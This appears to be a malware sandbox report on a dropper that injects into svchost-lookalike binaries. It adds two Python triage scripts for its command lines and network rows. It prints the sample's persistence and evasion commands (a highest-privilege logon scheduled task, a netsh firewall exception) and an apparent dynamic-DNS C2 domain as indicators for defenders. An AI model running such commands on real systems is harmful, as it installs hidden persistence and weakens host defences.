Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4648 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe
PID 4648 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe
PID 4648 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe
PID 4648 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe
PID 4648 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe
PID 4648 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe
PID 4648 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe
PID 4648 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe
PID 4648 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe
PID 4648 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe
PID 4648 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe
PID 4648 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe
PID 4648 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe
PID 4648 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe
PID 4648 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe
PID 4648 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe
PID 4648 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe
PID 4648 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 3380 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe
PID 1504 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 1504 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 1504 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 4524 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe
PID 4524 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe

Processes

C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe

"C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe"

C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe

"C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe"

C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe

"C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe"

C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe

"C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe"

C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe

"C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe"

C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe

"C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe"

C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe

"C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe"

C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe

"C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4648 -ip 4648

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 1340

C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe

"C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe"

C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe

"C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3380 -ip 3380

C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe

"C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe" 1504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3380 -s 1148

C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe

"C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe"

C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe

"C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4524 -ip 4524

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4524 -s 1152

C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe

"C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe"

C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe

"C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe"

C:\Windows\svehosts.exe

"C:\Windows\svehosts.exe"

C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe

"C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 444 -ip 444

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 444 -s 1128

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\excelsl.exe

C:\Windows\SysWOW64\notepad.exe

notepad

C:\Users\Admin\Documents\excelsl.exe

C:\Users\Admin\Documents\excelsl.exe

C:\Users\Admin\Documents\excelsl.exe

"C:\Users\Admin\Documents\excelsl.exe"

C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe

"C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1388 -ip 1388

C:\Windows\SysWOW64\notepad.exe

notepad

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1388 -s 1148

C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe

"C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3044 -ip 3044

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1084

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Windows\svehosts.exe" "svehosts.exe" ENABLE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\svehosts.exe" ..

C:\Windows\svehosts.exe

C:\Windows\svehosts.exe ..

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "'prndrvest"' /tr "'C:\Users\Admin\AppData\Roaming\prndrvest.exe"'

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2083.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Users\Admin\AppData\Roaming\prndrvest.exe

"C:\Users\Admin\AppData\Roaming\prndrvest.exe"
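The command lines above carry the whole persistence and evasion chain: a scheduled task created at logon with /RL HIGHEST that points into AppData\Roaming, a netsh firewall exception for a binary copied into the root of C:\Windows under a svchost-style name, and a stager batch file in Temp that calls timeout before prndrvest.exe starts. Added example, not part of the sandbox report or of any vendor's tooling: a Python triage script that runs such rules over captured command lines. The sample lines are the ones listed above; the rule names, the edit-distance threshold and the list of mimicked image names are assumptions of this example.

```python
"""Triage rules for captured process command lines.

Added example, not part of the sandbox report or of any vendor tooling:
runs a few detection rules over command lines and returns structured
findings. The sample lines are copied from the behavioral12 Processes
list; the rule names, the edit-distance threshold and the list of
commonly mimicked image names are assumptions made for this example.
"""
import re

# Copied verbatim from the behavioral12 Processes list in this report.
REPORT_CMDLINES = r"""
"C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe"
"C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe" 1504
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\excelsl.exe
netsh firewall add allowedprogram "C:\Windows\svehosts.exe" "svehosts.exe" ENABLE
C:\Windows\system32\cmd.exe /c "C:\Windows\svehosts.exe" ..
"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "'prndrvest"' /tr "'C:\Users\Admin\AppData\Roaming\prndrvest.exe"'
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2083.tmp.bat""
timeout 3
"C:\Users\Admin\AppData\Roaming\prndrvest.exe"
""".strip().splitlines()

# Assumed list of well-known image names that droppers like to imitate.
MIMICKED = ["svchost.exe", "services.exe", "lsass.exe", "csrss.exe", "explorer.exe", "excel.exe"]

EXE_NAME = re.compile(r"[\w.-]+\.exe", re.I)
USER_WRITABLE_EXE = re.compile(
    r'[A-Z]:\\(?:Users\\[^\s"\']*\\(?:AppData|Documents|Downloads|Desktop)|ProgramData)\\[^\s"\']*\.exe', re.I)
WINDOWS_ROOT_EXE = re.compile(r'[A-Z]:\\Windows\\[^\\\s"\']+\.exe', re.I)
TEMP_BAT = re.compile(r'\\Temp\\[^\s"\']*\.(?:bat|cmd)', re.I)
FIREWALL = re.compile(
    r'netsh\s+(?:firewall\s+add\s+allowedprogram|advfirewall\s+firewall\s+add\s+rule)[^\n]*?"([^"]+\.exe)"', re.I)


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch svbhost/svrhost/svehosts-style mimicry of svchost."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def triage(cmdline: str) -> list:
    """Return (rule, detail) findings for one command line."""
    low = cmdline.lower()
    findings = []
    # Persistence: scheduled task at logon/boot with the highest run level (T1053.005).
    if ("schtasks" in low and "/create" in low and "/rl highest" in low
            and re.search(r"/sc\s+on(?:logon|start)", low)):
        findings.append(("logon_task_highest", cmdline.strip()))
    # Defense evasion: firewall exception for an arbitrary program (T1562.004).
    if m := FIREWALL.search(cmdline):
        findings.append(("firewall_exception", m.group(1)))
    # Stager batch file in Temp, and the sleep such stagers usually carry.
    if m := TEMP_BAT.search(cmdline):
        findings.append(("temp_batch_stager", m.group(0)))
    if re.match(r"\s*timeout(?:\.exe)?\s+(?:/t\s+)?\d+", low):
        findings.append(("execution_delay", cmdline.strip()))
    # Executables in user-writable locations or dropped straight into C:\Windows.
    for path in USER_WRITABLE_EXE.findall(cmdline):
        findings.append(("user_writable_exe", path))
    for path in WINDOWS_ROOT_EXE.findall(cmdline):
        findings.append(("windows_root_exe", path))
    # Image names within two edits of a well-known name; exact matches are not flagged.
    for name in sorted({n.lower() for n in EXE_NAME.findall(cmdline)}):
        for legit in MIMICKED:
            if 0 < levenshtein(name, legit) <= 2:
                findings.append(("lookalike_name", f"{name} ~ {legit}"))
    return findings


def triage_all(lines=REPORT_CMDLINES) -> dict:
    """Map each command line to its findings, keeping only lines that fired."""
    out = {}
    for line in lines:
        hits = triage(line)
        if hits:
            out[line] = hits
    return out


if __name__ == "__main__":
    for line, hits in triage_all().items():
        print(line)
        for rule, detail in hits:
            print(f"    [{rule}] {detail}")
```

Every line in this detonation trips at least one rule; the lookalike check is what ties svbhost, svrhost, svthost, svuhost and svehosts together as one family of names rather than five unrelated binaries. The rules are deliberately narrow and are meant as a starting point for hunting queries, not as a complete signature set.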

Network

Country Destination Domain Proto
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
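Three resolver queries for sandyclark255.hopto.org (hopto.org is a No-IP dynamic-DNS zone) appear with no TCP connection to any resolved address, while c.pki.goog was resolved once and then fetched over port 80. Added example, not part of the sandbox report: a Python routine that groups rows of this table by domain, separates resolver queries from actual connections and flags names under dynamic-DNS providers, so a never-contacted C2 name is not mistaken for a live one. The rows are the ones above; the dynamic-DNS suffix list is an assumed, partial list for this example.

```python
"""Correlate the DNS rows with the connection rows of the Network table.

Added example, not part of the sandbox report: groups the table's rows by
domain, counts resolver queries, records follow-up connections and flags
names under dynamic-DNS providers. The sample rows are copied from the
Network table above; the dynamic-DNS suffix list is an assumed, partial
list kept short for this example.
"""
import re

# Rows copied from the Network table above: Country Destination Domain Proto.
REPORT_NETWORK = """
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
""".strip().splitlines()

# Assumed, deliberately short list; hopto.org is one of No-IP's free zones.
DYNAMIC_DNS_SUFFIXES = ("hopto.org", "no-ip.org", "no-ip.biz", "ddns.net", "zapto.org", "duckdns.org")

ROW = re.compile(r"^([A-Z]{2}) (\S+):(\d+) (\S+) (tcp|udp)$")


def is_dynamic_dns(domain: str) -> bool:
    """True when the name is exactly a listed zone or a child of one."""
    d = domain.lower().rstrip(".")
    return any(d == s or d.endswith("." + s) for s in DYNAMIC_DNS_SUFFIXES)


def summarize(rows) -> dict:
    """Per-domain view: resolver queries versus actual connections."""
    out = {}
    for line in rows:
        m = ROW.match(line.strip())
        if not m:
            continue
        country, ip, port, domain, proto = m.groups()
        entry = out.setdefault(domain, {"dns_queries": 0, "connections": [],
                                        "dynamic_dns": is_dynamic_dns(domain)})
        if proto == "udp" and port == "53":
            entry["dns_queries"] += 1   # sent to the resolver, not a contact with the domain
        else:
            entry["connections"].append(f"{proto} {ip}:{port} ({country})")
    return out


def verdict(entry: dict) -> str:
    """One-line triage reading of a summarize() entry."""
    tag = " [dynamic DNS]" if entry["dynamic_dns"] else ""
    if entry["connections"]:
        return f"resolved and contacted{tag}: " + ", ".join(entry["connections"])
    if entry["dns_queries"]:
        return (f"queried {entry['dns_queries']}x, never contacted{tag} "
                "(resolution failed, name sinkholed, or host down during detonation)")
    return "no activity"


if __name__ == "__main__":
    for domain, entry in summarize(REPORT_NETWORK).items():
        print(f"{domain}: {verdict(entry)}")
```

The distinction matters for blocking decisions: the hopto.org name is worth a DNS block and a hunt for other hosts querying it, but there is no resolved IP in this capture to add to a network indicator list.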

Files

memory/4648-0-0x0000000075092000-0x0000000075093000-memory.dmp

memory/4648-1-0x0000000075090000-0x0000000075641000-memory.dmp

memory/4648-2-0x0000000075090000-0x0000000075641000-memory.dmp

memory/4648-3-0x0000000075092000-0x0000000075093000-memory.dmp

memory/4648-4-0x0000000075090000-0x0000000075641000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe

MD5 2819e45588024ba76f248a39d3e232ba
SHA1 08a797b87ecfbee682ce14d872177dae1a5a46a2
SHA256 b82b23059e398b39f183ec833d498200029033b0fd3a138b6c2064a6fa3c4b93
SHA512 a38b58768daf58fa56ca7b8c37826d57e9dbfcd2dedf120a5b7b9aa36c4e10f64ec07c11dbd77b5861236c005fe5d453523911906dd77a302634408f1d78503a

